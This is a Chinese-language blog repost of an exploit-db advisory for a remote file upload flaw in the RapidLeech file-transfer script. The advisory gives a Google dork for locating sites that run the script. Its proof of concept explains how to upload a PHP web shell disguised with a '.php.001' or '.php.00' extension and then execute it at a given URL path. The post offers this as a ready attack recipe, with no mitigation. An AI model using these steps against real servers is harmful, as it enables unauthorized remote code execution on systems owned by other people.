RapidLeech脚本远程文件上传(上传php shell)漏洞
发布:wpulog | 发布时间: 2010年7月22日 RapidLeech是一款在多个流行上传下载站点(网盘系统)上使用的免费文件传输脚本程序,megaupload.com, Rapidshare.com 和超过45个其它网站都在使用它。RapidLeech脚本的用户应经超过500万,全球有2000多服务器安装了它。RapidLeech脚本存在远程文件上传漏洞,可能导致攻击者直接获取PHP shell。
[+]info:
~~~~~~~~~
# Exploit Title: RapidLeech Scrits Remote File Upload ( upload shell php )
# Author: H-SK33PY
# Software Link: http://www.rapidleech.com/
# Version: all versions
# Google dork :intitle:"Rx08.ii36B.Rv"
# Platform / Tested on: linux
# Category: remote
# Code : N/A
Iranian Datacoders Security Team 2010
[+]poc:
~~~~~~~~~
#BUG:
After find the site of rapidleecher script on this :
To Active For run this method change the name of shell code
example : shell.php >>>>>>> to shell.php.001 or shell.php.00
After trasfer this
you can run it in this Url :
http://site.com/0x14/shell.php.001
or
http://site.com/0x14/shell.php.00
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/14430
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。



